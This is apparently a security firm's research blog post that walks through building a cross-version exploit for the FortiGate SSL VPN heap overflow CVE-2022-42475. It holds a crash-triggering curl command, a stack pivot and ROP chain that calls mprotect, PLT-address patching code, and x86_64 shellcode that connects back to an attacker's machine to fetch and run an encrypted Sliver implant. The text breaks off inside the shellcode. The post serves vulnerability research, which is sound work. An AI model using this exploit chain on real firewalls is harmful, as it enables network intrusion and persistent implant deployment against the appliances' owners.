A More Complete Exploit for Fortinet CVE-2022-42475

Background

Recently, there has been some buzz about remotely exploitable vulnerabilities in Fortinet security appliances, especially FortiGate firewalls. This blog focuses on one such bug: CVE-2022-42475, a remotely exploitable heap overflow in the SSL VPN component of FortiGate and FortiProxy appliances. It was discovered in the wild by Fortinet in late 2022 during an investigation into a compromised firewall.

According to Fortinet, the following specific FortiGate models were targeted in attacks against unnamed European and African organizations:

  • FG100F
  • FG101F
  • FG200D
  • FG200E
  • FG201F
  • FG240D
  • FG3H0E
  • FG5H0E
  • FG6H1E
  • FG800D
  • FGT5HD
  • FGT60F
  • FGT80F

Our Cosmos customers were promptly notified when this vulnerability affected them. As always, we prioritize our security research efforts in order to inform our customers about zero-day vulnerabilities.

Mandiant also performed an analysis of the bug along with the BOLDMOVE malware deployed alongside the exploit. The activity was attributed to Chinese nation-state actors that discovered, weaponized, and leveraged their customized exploit to compromise sensitive networks. 

In this blog, we cover the bug, the outlines of the exploit, return-oriented programming (ROP) chains, shellcode, and optimizations. Unlike previously published research, we will share how an exploit can be built to work across different FortiGate appliances and FortiOS versions, rather than against a single specific appliance running a single specific version of FortiOS.

Since discovery and publication of details pertaining to CVE-2022-42475, a few researchers (see Prior Work below) have posted blogs and proof-of-concept (PoC) scripts that reproduce the bug and, in some cases, exploit it under highly restrictive conditions (i.e., specific appliance models and operating system versions).

Here on Team X, a specialized division within Bishop Fox's Capability Development group dedicated to vulnerability research and exploit development, we set out to build a more complete exploit for this bug. We are happy to report that we’ve largely succeeded in that mission and would like to share some of the journey with you.

Prior Work

We have a lot of ground to cover, so we won't be reviewing previous research in this blog. However, the publicly known state of FortiGate hacking is in its infancy, so we expect to see much more research in the future based on the work presented here and in other forums. To see details on initial work by other security researchers, check out these resources:

  • Fortinet's write-up of the bug.
  • Studyskill's work on extracting the affected/required files from FortiGate virtual machines.
  • SCRT's work on reproducing the bug.
  • Watchtowr's work on exploiting the bug.

Assumptions and Research Environment Configuration

Most of our testing was carried out against a FortiGate 100D purchased from eBay for a couple hundred dollars. It ran FortiOS 6.0.4 for the duration of the research project and sports an Intel x86_64 CPU. The remainder of testing was conducted against VMware versions of FortiGate. All FortiGate devices are Linux-based, albeit stripped down to the bare bones.

Simply being in possession of a FortiGate device is insufficient for research purposes because we needed root access to the underlying Linux OS (a.k.a. FortiOS) on hardware appliances and virtual machines to kick start our research. We determined that Fortinet did not provide a mechanism to obtain a root shell on their appliances, so we needed to hack a solution.

Getting Root Access to the 100D

To get a root shell on the 100D and to install GDB, Frida server, etc. we created a local root exploit for another FortiGate bug (CVE-2021-44168). Interestingly, much like CVE-2022-42475, CVE-2021-44168 was discovered during the investigation of a compromised FortiGate firewall. Note: we are beginning to see a pattern of a nation-state actor that has gone to great lengths to reverse-engineer Fortinet devices and create private 0-days for use against high-value targets. 

The Bug

Reproducing the Crash

Based on SCRT's and Watchtowr's work, we started with these exploit commands:

$ perl -e 'print "A"x100000' > payload 
$ curl --data-binary @payload -H 'Content-Length: 4294967297' -vik 'https://vpn.example.com:8443/remote/logincheck?AAAA=BBBB'

When we attached to the sslvpnd daemon with gdb, we saw the following crash:

(gdb) c 
Continuing.

Program received signal SIGSEGV, Segmentation fault. 
0x00007fae8fe964ee in ?? () from /fortidev/lib/x86_64-linux-gnu/libssl.so.1.1

Take a look at where it crashed:

(gdb) x/2i $rip                    
=> 0x7fae8fe964ee:      call   QWORD PTR [rax] 
   0x7fae8fe964f0:      test   eax,eax

We see that it dereferenced the rax register to fetch a function pointer and called it! What's in memory at the address in rax?

(gdb) x/8x $rax  
0x7fae8b58ea00: 0x41414141      0x41414141      0x41414141      0x41414141 
0x7fae8b58ea10: 0x41414141      0x41414141      0x41414141      0x41414141

Well, well, well. Our payload appeared – what an absolute score of a result! The stars sure did align for this one.

Please note that we're not diving into the root causes of this bug. For that, please refer to Watchtowr's research on the matter. We're focused strictly on exploitation.

Identifying Exploit Mitigations

During our research, we investigated the exploit mitigation controls in FortiGate firewalls. We found the usual Linux OS-enforced data execution prevention (DEP), but a few things were missing, such as address space layout randomization (ASLR), stack canaries, and position independent executables (PIE). This trend seemed to be consistent across VMs and FortiGate hardware appliances.

Setting Exploit Goals

We wanted to drop a Sliver Linux implant onto the firewall, so we could use it as a pivot point into an organization's networks. Sliver implants are typically large (10MB is reasonable), and we found that embedding one into an HTTP POST request led to corruption every time. We simply could not inject the entire implant binary into memory reliably, and since reliability is one of the core goals of a high-quality exploit, we abandoned this approach. The root cause seemed to be the SSL VPN software scribbling over the implant data prior to the exploit being triggered. We could have written the exploit to shell out to the FortiGate's underlying Linux OS to perform a download of the Sliver implant, but there were several problems with that approach:

  • No functioning shell in FortiOS
  • No Perl, Ruby, PHP, etc., scripting languages
  • Python isn't ubiquitous and is only present on older firewalls
  • No consistent way to write a generic shell-out payload

Instead, we decided on using a more generic shellcode stager that ran in the following way:

  • Attacker runs the exploit
  • Exploit runs shellcode on the target appliance
  • Shellcode connects back to attacker and downloads an encrypted Sliver implant
  • Shellcode decrypts the Sliver implant and saves it to disk
  • Shellcode runs the Sliver implant which connects back to attacker's Sliver server

Exploiting like the 90s

If we could execute code on the heap, we would have been in good shape to just write some shellcode, put it on the heap, and execute call [rax], but Linux DEP prevents that. Instead, we had to do some ROP chaining in which we found and reused existing code "gadgets" in the FortiGate sslvpnd binary (which is actually just a symlink to a monolithic, 80MB, dynamically linked init binary).

We didn’t want to use ROP for the entire download/decrypt/execute sequence because that would be too painful, so we needed to jump from ROP into shellcode as quickly as possible. The goal of our ROP chain was simple:

  • Pivot the stack pointer rsp to point at our HTTP POST payload, where the ROP chain and shellcode are stored.
  • Make the payload executable by calling mprotect(rsp & 0xfffffffffffff000, 0x5000, PROT_READ | PROT_WRITE | PROT_EXEC) on the memory region in which it is stored (the bitmask is used to align the memory address to a 4k page boundary).
  • Jump to shellcode within the payload.

Typically, ROP gadgets are built into a chain that repeats execute instructions; return; until the desired objective is met, but the first and second steps are a little more convoluted than they seem at first. Let's check it out!

Execute the Stack Pivot

At the moment call [rax] was executed (remember we controlled the address dereferenced at rax), the stack pointer rsp pointed at sslvpnd’s real stack. This was useless to us because our payload wasn’t there. It was somewhere on the heap, which means we had to figure out how to put the address of our payload into rsp using only a single gadget. This is not always the case, but the complexity of multi-gadget stack pivots is outside the scope of this blog post.

Why just one gadget? At the end of a gadget, we'll typically hit a ret instruction, which pops an address off the stack at address rsp and jumps to it by placing that address into the rip register. If rsp doesn't point to our ROP chain when the ret instruction executes, then we're hosed. We have no control over the popped value, and we jump into garbage...or random instructions...or the stack. Regardless of where rip ends up, the effect is the same - insta-crash.

The easiest way to pivot was to find a pointer to our payload in one of the registers and find a gadget that does the equivalent of mov rsp, <register>; ret;. Did we have a pointer to the payload in any of the registers at the moment of exploitation? The answer in this case is yes!

Let's look at the registers at the point of crash:

(gdb) i r 
rax            0x4141414141414141  4702111234474983745 
rbx            0x7fae8b569800      140387638745088 
rcx            0x0                 0 
rdx            0x7fae8b56d4f8      140387638760696 
rsi            0x7fae8b5736a8      140387638785704 
rdi            0x7fae8b569800      140387638745088 
rbp            0x7fffe4f967e0      0x7fffe4f967e0 
rsp            0x7fffe4f94688      0x7fffe4f94688 
r8             0x4141414141414141  4702111234474983745 
r9             0x4141414141414141  4702111234474983745 
r10            0x4141414141414141  4702111234474983745 
r11            0x4141414141414141  4702111234474983745 
r12            0x7fae8b569940      140387638745408 
r13            0x7fae8b56d4f8      140387638760696 
r14            0x131d2fc0          320679872 
r15            0x7fae8b5736a8      140387638785704 
rip            0x7fae8fe964ee      140387715474670  
eflags         0x206               [ PF IF ] 
cs             0x33                51 
ss             0x2b                43 
ds             0x0                 0 
es             0x0                 0 
fs             0x0                 0 
gs             0x0                 0

Ok, what's in rdx?

(gdb) x/xg $rdx 
0x7fae8b56d4f8: 0x4141414141414141

Bingo! rdx pointed into our HTTP POST data. Therefore, the stack pivot requirements were as simple as mov rsp, rdx; ret. Sadly, there was no such gadget in the sslvpnd binary (whomp whomp). Time to hunt for more tricky gadgets!

After some fiddling with ropr, we identified a regex that hit a few suitable gadgets:

0x00d90512: push rdx; lodsb [rsi]; adc bl, [rbx+0x41]; pop rsp; pop rbp; ret; 
0x0130acd4: push rdx; add [rbx+0x41], ebx; pop rsp; mov qword ptr [rip+0x14792b24], 0x130aa20; pop rbp; ret; 
0x01877a81: push rdx; add bl, [rbx+0x41]; pop rsp; pop rbp; ret; 
0x01b666bc: push rdx; adc [rbx+0x41], bl; pop rsp; pop rbp; ret; 
0x0285c4b0: push rdx; mov esi, 0xc48348fd; and [rbx+0x41], bl; pop rsp; pop rbp; ret; 
 
==> Found 5 gadgets in 5.543 seconds

The simplest gadgets were:

0x01877a81: push rdx; add bl, [rbx+0x41]; pop rsp; pop rbp; ret; 
0x01b666bc: push rdx; adc [rbx+0x41], bl; pop rsp; pop rbp; ret;
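
The filtering step can be reproduced offline on the gadget listing itself. The sketch below is only an illustration: the regular expression is a hypothetical stand-in (not the pattern we passed to ropr), and the function names are ours. It keeps gadgets that start with push rdx, later pop rsp, and end in ret, then ranks them by instruction count.

```python
import re

# Gadget listing copied from the ropr output above.
ROPR_OUTPUT = """\
0x00d90512: push rdx; lodsb [rsi]; adc bl, [rbx+0x41]; pop rsp; pop rbp; ret;
0x0130acd4: push rdx; add [rbx+0x41], ebx; pop rsp; mov qword ptr [rip+0x14792b24], 0x130aa20; pop rbp; ret;
0x01877a81: push rdx; add bl, [rbx+0x41]; pop rsp; pop rbp; ret;
0x01b666bc: push rdx; adc [rbx+0x41], bl; pop rsp; pop rbp; ret;
0x0285c4b0: push rdx; mov esi, 0xc48348fd; and [rbx+0x41], bl; pop rsp; pop rbp; ret;
"""

# Hypothetical pattern (an assumption, not the regex used with ropr):
# begins with "push rdx", contains "pop rsp" later, ends with "ret;".
PIVOT_RE = re.compile(r"^push rdx;.*\bpop rsp;.*\bret;$")


def parse_gadgets(text):
    """Return a list of (address, [instructions]) for pivot candidates."""
    gadgets = []
    for line in text.splitlines():
        addr, _, body = line.partition(": ")
        body = body.strip()
        if PIVOT_RE.match(body):
            insns = [i.strip() for i in body.split(";") if i.strip()]
            gadgets.append((int(addr, 16), insns))
    return gadgets


def simplest(gadgets):
    """Return the addresses of the gadgets with the fewest instructions."""
    fewest = min(len(insns) for _, insns in gadgets)
    return [addr for addr, insns in gadgets if len(insns) == fewest]


pivot_candidates = parse_gadgets(ROPR_OUTPUT)
shortest = simplest(pivot_candidates)
print([hex(a) for a in shortest])
```

Ranking by instruction count is a crude proxy for "fewest side effects"; each extra instruction still has to be checked by hand, as we do next for the adc.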

Picking the gadget at address 0x01b666bc, we confirmed the gadget's existence and accuracy using Radare2:

r2 ./[redacted]/init 
 -- r2 is for the people 
[0x00447d30]> s 0x01b666bc 
[0x01b666bc]> pi 5 
push rdx 
adc byte [rbx + 0x41], bl 
pop rsp 
pop rbp 
ret

Excellent! There was only one remaining concern since this gadget had a few extraneous instructions, in particular adc byte [rbx + 0x41], bl. This instruction dereferenced and wrote to the memory address stored in the rbx register, which means rbx had to point to a valid, mapped, and writeable area of memory. If it didn’t, the gadget would crash, and we would have needed a new gadget.

We were in luck, though, because of what we found in rbx at the moment of exploitation:

(gdb) i r rbx 
rbx            0x7fae8b569800      140387638745088 
(gdb) x/xg $rbx 
0x7fae8b569800: 0x4141414141414141

That is a valid address alright – this gadget wouldn’t crash! The effective action of the stack pivot gadget (ignoring extraneous instructions) is therefore:

push rdx 
pop  rsp 
ret

Now that we had a stack pivot gadget, we proceeded to the rest of the ROP chain.
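
One detail worth spelling out is that the real gadget also executes pop rbp before ret, so the first 8 bytes at rdx are consumed as a throwaway value and the first ROP gadget address has to sit at rdx + 8. The toy emulation below is a sketch of that behaviour under simplifying assumptions: memory is a flat bytearray, the adc instruction is ignored, and the gadget addresses 0x1111 and 0x2222 are made-up placeholders.

```python
import struct


def simulate_pivot(memory, base, regs):
    """Emulate 'push rdx; pop rsp; pop rbp; ret' on a toy memory model.

    memory: bytearray holding the payload
    base:   virtual address of memory[0]
    regs:   dict of register values at the moment of the hijacked call
    """
    def read_qword(addr):
        return struct.unpack_from("<Q", memory, addr - base)[0]

    regs = dict(regs)
    # push rdx; pop rsp  => rsp now holds the old rdx (pointer into payload)
    regs["rsp"] = regs["rdx"]
    # pop rbp            => consumes the first qword of the payload
    regs["rbp"] = read_qword(regs["rsp"])
    regs["rsp"] += 8
    # ret                => rip = next qword, i.e. the first real gadget
    regs["rip"] = read_qword(regs["rsp"])
    regs["rsp"] += 8
    return regs


# rdx and rsp values taken from the register dump above.
payload_base = 0x7FAE8B56D4F8
payload = bytearray(struct.pack("<QQQ", 0x4242424242424242, 0x1111, 0x2222))
after = simulate_pivot(payload, payload_base,
                       {"rdx": payload_base, "rsp": 0x7FFFE4F94688})
print({name: hex(value) for name, value in after.items()})
```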

Find the mprotect(2) Function

To make our shellcode executable, we needed the address of mprotect(2) in the target binary's procedure linkage table (PLT). The address was easy to obtain using objdump:

objdump -D -j .plt init-6.4.9-800D | egrep 'mprotect' 
000000000042ac50 <mprotect@plt>:

The address 0x42ac50 was the trampoline for the mprotect function. If we jumped to it, we called mprotect. It is important to note that this address was valid only for this specific binary; any other version of the FortiOS init binary would have a slightly different address. For example, we used init from the FortiGate 100D 6.0.4 firmware:

objdump -D -j .plt init-6.0.4-100D | egrep 'mprotect' 
0000000000420630 <mprotect@plt>:

We saw that 0x420630 was not the same as 0x42ac50. Therefore, we needed the function PLT addresses for each version of FortiOS that we wished to exploit. More on this later! For now, we had our mprotect address. How did we use it?
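
A per-version lookup table falls out of the objdump output quite naturally. The following is a minimal sketch, assuming the output lines have the exact shape shown above; the function name parse_plt and the PLT_TABLE dictionary are illustrative names, not part of our exploit code.

```python
import re

# Matches lines such as "0000000000420630 <mprotect@plt>:"
PLT_LINE = re.compile(r"^([0-9a-f]{16}) <([A-Za-z0-9_]+)@plt>:$")


def parse_plt(objdump_text):
    """Map function name -> PLT address for every '<name@plt>:' line."""
    table = {}
    for line in objdump_text.splitlines():
        match = PLT_LINE.match(line.strip())
        if match:
            table[match.group(2)] = int(match.group(1), 16)
    return table


# One entry per init binary, keyed by the file names used above.
PLT_TABLE = {
    "init-6.4.9-800D": parse_plt("000000000042ac50 <mprotect@plt>:"),
    "init-6.0.4-100D": parse_plt("0000000000420630 <mprotect@plt>:"),
}

for binary, plt in PLT_TABLE.items():
    print(binary, hex(plt["mprotect"]))
```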

Examine the Structure of mprotect

The mprotect function is a thin wrapper around the mprotect system call. Normally, we would have just found a gadget like syscall; ret; to invoke the system call directly, but in this case, we found that the available gadgets were of such low quality (they stomped all over a bunch of registers and memory) that we instead called the library function through its PLT entry.

Let's consider how to call mprotect

int mprotect(void *addr, size_t len, int prot);

So, we needed to do this:

#define PROT_RWX        7      // PROT_READ | PROT_WRITE | PROT_EXEC 
#define MEMORY_LENGTH   0x5000 // not important, just make it big enough for all the shellcode 
#define ALIGNED_ADDRESS (address_of_shellcode & 0xfffffffffffff000) // page-aligned address 
mprotect(ALIGNED_ADDRESS, MEMORY_LENGTH, PROT_RWX);

The mprotect call had to be passed a memory address that lies on a 4k page boundary, hence the bitwise AND operation. If the address wasn’t on a page boundary, then the call would fail.

When calling functions on x86_64 System V ABI (as used by Linux / FortiOS), the arguments were passed in the registers rdi, rsi, rdx, rcx, r8, and r9 in that order. We used the first three registers to populate the three parameters passed to mprotect:

rdi = ALIGNED_ADDRESS 
rsi = 0x5000 
rdx = 7

The last two registers were easy to set using ROP gadgets: we just did pop rsi; ret; and pop rdx; ret; and placed the values we needed onto the stack / ROP chain. Getting an aligned address into rdi was a little more difficult because we needed to do the following steps:

  • Get the memory address of our ROP chain / shellcode
  • Do the bitwise AND operation
  • Store the result in rdi

Get the Address of Our ROP Chain

Let's look at the registers at the point of crash:

(gdb) i r 
rax            0x4141414141414141  4702111234474983745 
rbx            0x7fae8b569800      140387638745088 
rcx            0x0                 0 
rdx            0x7fae8b56d4f8      140387638760696 
rsi            0x7fae8b5736a8      140387638785704 
rdi            0x7fae8b569800      140387638745088 
rbp            0x7fffe4f967e0      0x7fffe4f967e0 
rsp            0x7fffe4f94688      0x7fffe4f94688 
r8             0x4141414141414141  4702111234474983745 
r9             0x4141414141414141  4702111234474983745 
r10            0x4141414141414141  4702111234474983745 
r11            0x4141414141414141  4702111234474983745 
r12            0x7fae8b569940      140387638745408 
r13            0x7fae8b56d4f8      140387638760696 
r14            0x131d2fc0          320679872 
r15            0x7fae8b5736a8      140387638785704 
rip            0x7fae8fe964ee      140387715474670  
eflags         0x206               [ PF IF ] 
cs             0x33                51 
ss             0x2b                43 
ds             0x0                 0 
es             0x0                 0 
fs             0x0                 0 
gs             0x0                 0

We had the approximate address of our payload / ROP chain / shellcode in registers rbx, rdx, rdi, rsi, r12, r13, and r15. We say "approximate" because all those registers pointed to slightly different addresses within the payload. This is fine because we were rounding down to the nearest 4k page, so we didn’t care about the least significant 12 bits (three hex digits). With this in consideration, we got:

rbx            0x7fae8b569800 
rdx            0x7fae8b56d4f8 
rsi            0x7fae8b5736a8 
rdi            0x7fae8b569800 
r12            0x7fae8b569940 
r13            0x7fae8b56d4f8 
r15            0x7fae8b5736a8

We discarded any address starting with 0x7fae8b57xxxx because those addresses were too far into our payload. We ran the risk of making the wrong section of memory executable. The following candidates remained:

rbx            0x7fae8b569800 
rdx            0x7fae8b56d4f8 
rdi            0x7fae8b569800 
r12            0x7fae8b569940 
r13            0x7fae8b56d4f8

We discarded the higher addresses, which left:

rbx            0x7fae8b569800 
rdi            0x7fae8b569800

rbx and rdi were our candidate registers for finding the address of our payload / ROP chain / shellcode. We wanted to perform a bitwise AND operation such that 0x7fae8b569800 & 0xfffffffffffff000 = 0x7fae8b569000.
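
The selection and alignment arithmetic can be checked in a few lines. This sketch uses the register values from the dump above and the 0x5000 region length from the earlier mprotect pseudocode; the helper names are ours.

```python
PAGE_MASK = 0xFFFFFFFFFFFFF000   # clears the low 12 bits (4k pages)
REGION_LEN = 0x5000              # length passed to mprotect

# Registers that pointed into the payload at the point of the crash.
payload_pointers = {
    "rbx": 0x7FAE8B569800,
    "rdx": 0x7FAE8B56D4F8,
    "rsi": 0x7FAE8B5736A8,
    "rdi": 0x7FAE8B569800,
    "r12": 0x7FAE8B569940,
    "r13": 0x7FAE8B56D4F8,
    "r15": 0x7FAE8B5736A8,
}


def page_align(addr):
    """Round an address down to the start of its 4k page."""
    return addr & PAGE_MASK


lowest = min(payload_pointers.values())
best_registers = sorted(r for r, v in payload_pointers.items() if v == lowest)
region_start = page_align(lowest)
region_end = region_start + REGION_LEN

# Which of the pointers fall inside the region mprotect would cover?
in_region = {r: region_start <= v < region_end
             for r, v in payload_pointers.items()}

print(best_registers, hex(region_start), hex(region_end))
print(in_region)
```

With these values, the region starting at the page containing rbx/rdi also covers the address held in rdx, which is where the pivoted stack lands.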

Call mprotect to Make Our Payload Executable

We assembled the following gadget chain to perform the operation:

// Set up arguments #2 and #3 for mprotect 
pop rsi; ret;                  // pop 0x5000 off the "stack" (aka ROP Chain) into rsi (2nd mprotect argument) 
pop rdx; ret;                  // pop 0x7 off the "stack" into rdx (3rd mprotect argument ) 
 
// Set up argument #1 for mprotect 
pop rax; ret;                // pop 0xfffffffffffff000 off the "stack"  into rax 
and rax, rdi; ret;       // do "0xfffffffffffff000 & 0x7fae8b569800" and save result in rax 
 
// There is no "mov rdi, rax; ret;" gadget available, so we use this more complex variant instead. 
pop rbx; ret;                 // pop address of a NOP gadget off the "stack" into rbx 
mov rdi, rax; call rbx;  // copy page-aligned address into rdi (1st mprotect argument) 
                                     // call rbx (address of NOP gadget that simply does a RET) 
 
// We put 8 RET instructions on the ROP chain so that the NOP gadget's RET lands here. 
// You could call this a "ret sled" instead of a "nop sled". 
ret; 
ret; 
ret; 
ret; 
ret; 
ret; 
ret; 
ret; 
 
// Call mprotect 
pop rax; ret;                  // pop the mprotect PLT address off the "stack" 
jmp rax;                          // mprotect will RET and execution will continue at the next ROP instruction

We now had executable shellcode at a known address in memory.
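
To show how a chain like this ends up as bytes in the HTTP POST body, here is a minimal packing sketch. Everything in HYPOTHETICAL_GADGETS except mprotect_plt is a made-up placeholder address (real values depend on the target init binary), the "NOP gadget" is modelled as a plain ret as in the listing above, and the final jmp rsp entry anticipates the last step of the chain. The throwaway qword consumed by the pivot's pop rbp is not included here.

```python
import struct

PAGE_MASK = 0xFFFFFFFFFFFFF000
REGION_LEN = 0x5000
PROT_RWX = 7  # PROT_READ | PROT_WRITE | PROT_EXEC

# Placeholder addresses for illustration only (assumptions), apart from
# mprotect_plt, which is the init-6.0.4-100D value shown by objdump earlier.
HYPOTHETICAL_GADGETS = {
    "pop_rsi": 0x1001,
    "pop_rdx": 0x1002,
    "pop_rax": 0x1003,
    "and_rax_rdi": 0x1004,
    "pop_rbx": 0x1005,
    "ret": 0x1006,
    "mov_rdi_rax_call_rbx": 0x1007,
    "jmp_rax": 0x1008,
    "jmp_rsp": 0x1009,
    "mprotect_plt": 0x420630,
}


def build_rop_chain(g, shellcode):
    """Pack the gadget chain as little-endian qwords, then append shellcode."""
    chain = [
        g["pop_rsi"], REGION_LEN,        # rsi = length
        g["pop_rdx"], PROT_RWX,          # rdx = protection flags
        g["pop_rax"], PAGE_MASK,         # rax = page mask
        g["and_rax_rdi"],                # rax = rdi & mask
        g["pop_rbx"], g["ret"],          # rbx = address of the "NOP" gadget
        g["mov_rdi_rax_call_rbx"],       # rdi = aligned address
    ]
    chain += [g["ret"]] * 8              # the "ret sled"
    chain += [
        g["pop_rax"], g["mprotect_plt"],
        g["jmp_rax"],                    # call mprotect via its PLT entry
        g["jmp_rsp"],                    # fall through into the shellcode
    ]
    return b"".join(struct.pack("<Q", q) for q in chain) + shellcode


rop_payload = build_rop_chain(HYPOTHETICAL_GADGETS, b"\x90" * 16)
print(len(rop_payload), rop_payload[:16].hex())
```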

Jump to Our Shellcode

The jump to shellcode was simple: 

// Last instruction in the ROP chain simply jumps to the stack pointer which 
// conveniently points at the next item on our payload / ROP chain / shellcode. 
jmp rsp; 
 
// Shellcode follows 
0x9090909090909090		   // NOP sled 
...

Writing the Shellcode

We could use arbitrary shellcode in the exploit because there were no disallowed characters. This made the process of writing shellcode pretty straightforward. Of course, we over-complicated this process to achieve the following goals:

  • All shellcode/payload/staging/implant/data must be encrypted in transit over the internet
  • Everything in the exploit payload must fit into a 64k buffer to avoid data corruption
  • The exploit must get feedback from the shellcode regarding its status as it runs
  • The exploit must deploy a Sliver implant onto the FortiGate firewall

Encrypt All the Things

We could have written our own crypto functions, but that wasn’t efficient. Instead, we borrowed OpenSSL's AES_set_decrypt_key and AES_cbc_encrypt functions from the FortiGate binary's PLT by using the same objdump trick we used for mprotect:

objdump -D -j .plt init-6.0.4-100D | egrep ' <(mprotect|calloc|AES_set_decrypt_key|AES_cbc_encrypt)@plt'| sed -e 's/00000000//g' -e 's/ </:/g' -e 's/@plt>://g' 
00420630:mprotect 
00424720:AES_cbc_encrypt 
00424a40:calloc 
00426d70:AES_set_decrypt_key

The exploit then patched the decryption function PLT addresses into the shellcode at runtime. For example, here's a snippet from the shellcode where the address of AES_set_decrypt_key() was marked with a placeholder until the exploit replaced it with the correct value:

# setup and call OpenSSL's AES_set_decrypt_key() 
movq   %r10,   %rdi                             # ptr to AES key bytes 
movq   $0x80,  %rsi                             # 128 (0x80) bits 
movq   %r15,   %rdx                             # AES_key struct address 
movabs $0x3333333333333333, %rax                # replaced at runtime with real PLT address 
movq   %rax,   %rcx                             # address of AES_set_decrypt_key() 
movq   %rsp,   %rbx 
addq   $0x4000,%rsp 
callq  *%rcx

Inside the exploit our code did this prior to copying the shellcode into the exploit payload buffer:

# fix up PLT function addresses in the shellcode 
shellcode = shellcode.replace(b"33333333", struct.pack("<Q", rop.get_address("AES_set_decrypt_key"))) 
shellcode = shellcode.replace(b"44444444", struct.pack("<Q", rop.get_address("AES_cbc_encrypt"))) 
shellcode = shellcode.replace(b"55555555", struct.pack("<Q", rop.get_address("calloc")))

This method allowed us to write the shellcode and make it portable across all of the versions of FortiGate that we wanted to target.
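
A slightly more defensive version of the same idea is sketched below. It is an illustration rather than our production code: the PLACEHOLDERS table and patch_addresses function are names invented for this example, and the stub shellcode is just three movabs instructions. The PLT values are the init-6.0.4-100D addresses listed above. The extra check refuses to patch if a marker is missing or appears more than once, which would otherwise silently produce broken shellcode.

```python
import struct

# 8-byte ASCII markers as they appear in the assembled shellcode,
# e.g. movabs $0x3333333333333333 encodes the bytes b"33333333".
PLACEHOLDERS = {
    b"3" * 8: "AES_set_decrypt_key",
    b"4" * 8: "AES_cbc_encrypt",
    b"5" * 8: "calloc",
}

# PLT addresses for init-6.0.4-100D, from the objdump output above.
PLT_6_0_4_100D = {
    "AES_cbc_encrypt": 0x424720,
    "calloc": 0x424A40,
    "AES_set_decrypt_key": 0x426D70,
}


def patch_addresses(shellcode, plt):
    """Replace each marker with the little-endian PLT address it stands for."""
    for marker, name in PLACEHOLDERS.items():
        if shellcode.count(marker) != 1:
            raise ValueError(f"expected exactly one marker for {name}")
        shellcode = shellcode.replace(marker, struct.pack("<Q", plt[name]))
    return shellcode


# Stub shellcode: three 'movabs $imm64, %rax' instructions (opcode 48 b8).
MOVABS_RAX = b"\x48\xb8"
stub = b"".join(MOVABS_RAX + marker for marker in PLACEHOLDERS)
patched = patch_addresses(stub, PLT_6_0_4_100D)
print(patched.hex())
```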

Shellcode

Speaking of shellcode, let’s take a look at it.

# assemble: as -o shellcode.o shellcode.s 
#  convert: objdump -d -M intel shellcode.o|egrep '^...[a-z0-9]:'|cut -c 7-28|tr -d '\n'|tr -d ' '|tr -d '\t'|sed 's/\(..\)/\\x\1/g' 
 
        .global _shellcode 
        .global _readloop 
        .text

Above, we saw the preamble and a set of comments with instructions on how to convert the assembled .o file into a \x-encoded sequence of op-code bytes.

Next, we called socket(2) to create a new socket that we used to connect back from the exploited FortiGate to the attacker's internet-facing computer:

_shellcode: 
 
        # socket(2) 
        movq   $0x2,  %rdi                              # AF_INET 
        movq   $0x1,  %rsi                              # SOCK_STREAM 
        movq   $0x0,  %rdx                              # 0 
        movq   $0x29, %rax                              # 41 = 0x29 = socket syscall 
        syscall                                         # rax = socket(AF_INET, SOCK_STREAM, 0); 
        movq   %rax, %rbx                               # save socket fd in rbx

Having acquired a socket, the next step was to connect(2) to the attacker's computer. We did this by creating the required data structures in registers and then pushing them onto the stack to create a C-style struct. The comments in the code showed exactly what each byte was doing in each register:

# connect(2) 
 
        # We're going to build a hokey sockaddr_in struct using registers, then push it to the stack. 
        # Here's the struct: 
        # 
        # struct sockaddr_in { 
        #       short            sin_family;   // e.g. AF_INET 
        #       unsigned short   sin_port;     // e.g. htons(3490) 
        #       struct in_addr   sin_addr;     // see struct in_addr, below 
        #       char             sin_zero[8];  // zero this by convention 
        # }; 
        #  
        # struct in_addr { 
        #       unsigned long s_addr;          // IPv4 address in network (big endian) byte order 
        # }; 
        xorq   %rdx, %rdx                                
        pushq  %rdx                                     # push 0x0000000000000000 (sockaddr_in->sin_zero) 
        # I = IP address 
        # P = TCP port 
        # F = AF_INET 
        #         IIIIIIIIPPPPFFFF 
        movq   $0x5858585858580002, %rdx                # sockaddr_in-> sin_addr, sin_port, sin_family 
        pushq  %rdx                                     # store it after sin_zero on the stack 
        movq   %rax,  %rdi                              # %rax = sock # from socket() syscall 
        movq   $0x10, %rdx                              # sizeof(sockaddr_in) = 16 bytes 
        movq   %rsp,  %rsi                              # sockaddr_in struct is on stack @ %rsp 
        movq   $0x2a, %rax                              # connect(2) syscall 
        syscall
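
The 0xIIIIIIIIPPPPFFFF immediate is easiest to understand by building it from the bytes that must end up in memory. The sketch below computes it for a given callback address; the function name is ours, and 192.0.2.1:4444 is a documentation-range example, not a real listener. How the exploit patches the value into the shellcode is not shown here.

```python
import socket
import struct

AF_INET = 2  # value of AF_INET on Linux


def sockaddr_in_immediate(ip, port):
    """Return the 64-bit immediate whose little-endian bytes form the first
    8 bytes of a sockaddr_in: sin_family, sin_port, sin_addr."""
    raw = (
        struct.pack("<H", AF_INET)   # sin_family, host (little-endian) order
        + struct.pack(">H", port)    # sin_port, network (big-endian) order
        + socket.inet_aton(ip)       # sin_addr, network byte order
    )
    return int.from_bytes(raw, "little")


imm = sockaddr_in_immediate("192.0.2.1", 4444)
print(hex(imm))
```

Because pushq stores the register in little-endian order, the IP address and port appear byte-reversed when the immediate is read as a single hexadecimal number.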

Once the shellcode connected to the attacker's computer it sent a quick "hello" packet containing an arbitrary 8-byte value specified by the exploit. The exploit checked the packet and verified that it contained the expected 8-byte value. If the value matched, it was assumed that the shellcode was running correctly:

# write(2) response to the stager to say hello 
        subq   $0x20,  %rsi 
        movabs $0x3838383838383838, %rax 
        movq   %rax,  (%rsi)                            # response contains whatever the exploit patched in here. 
        movq   %rbx,   %rdi                             # socket fd -> rdi 
        movq   $0x8,   %rdx                             # payload len = 8 bytes 
        movq   $0x1,   %rax                             # write(2) syscall 
        syscall                                          # send the hello to hax0r host

The shellcode then expected the exploit to send a 4-byte length value followed by an encrypted data blob of that length. The data blob was eventually decrypted, saved to the filesystem of the firewall, and passed to execve to be executed as an implant. The following code read the length value and saved it in the r13 register:

# read(2) 4 bytes to use as size X for next read 
        movq   %rbx,  %rdi                              # fd -> rdi 
        movq   %rsp,  %rsi                              # stack ptr -> rsi 
        subq   $0x8,  %rsi                              # move rsi up 8 bytes (storage location) 
        movq   $0x4,  %rdx                              # read 4 bytes 
        movq   $0x0,  %rax                              # read(2) system call 
        syscall                                         # read 4 bytes from socket. use it as <size> for the next payload. 
 
        # save the payload size in r13 
        movq   (%rsi), %rdx                              # rdx = num bytes to read from socket 
        movq   %rdx,   %r13                              # save payload size in r13

